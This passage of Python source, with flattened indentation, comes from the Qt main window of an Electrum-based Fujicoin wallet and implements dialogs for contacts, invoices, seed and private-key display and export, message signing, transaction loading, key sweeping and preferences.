self.show_message(msg, title=_('Pay to many'))
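# Illustrative "Pay to many" input (one output per line; hypothetical
# placeholder addresses):
#
#     <address_1>, 0.01
#     <address_2>, 0.5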
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
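# Two flows: wallets whose storage encryption key is derived from a hardware
# device (STO_EV_XPUB_PW) use ChangePasswordDialogForHW and obtain the
# storage password from the device; software wallets use
# ChangePasswordDialogForSW with an ordinary old/new password prompt.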
from electrum.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Fujicoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Fujicoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a fujicoin URI
if str(data).startswith("fujicoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
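# (raw transactions are QR-encoded in base43, whose alphabet fits the QR
# alphanumeric character set and keeps codes denser than byte mode)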
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + str(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
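# Illustrative CSV output (hypothetical values):
#
#     address,private_key
#     <address_1>,<WIF_key_1>
#     <address_2>,<WIF_key_2>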
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {str(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(str(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
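# Combo index mapping: 0 = Static, 1 = ETA (time based), 2 = Mempool; the
# expression above maps the current config onto that index.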
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf = self.config.get('use_rbf', True)
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(use_rbf)
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', bool(x))
batch_rbf_cb.setEnabled(bool(x))
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
batch_rbf_cb = QCheckBox(_('Batch RBF transactions'))
batch_rbf_cb.setChecked(self.config.get('batch_rbf', False))
batch_rbf_cb.setEnabled(use_rbf)
batch_rbf_cb.setToolTip(
_('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \
_('This will save fees.'))
def on_batch_rbf(x):
self.config.set_key('batch_rbf', bool(x))
batch_rbf_cb.stateChanged.connect(on_batch_rbf)
fee_widgets.append((batch_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 FJC = 1000 mFJC. 1 mFJC = 1000 bits. 1 bit = 100 sat.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
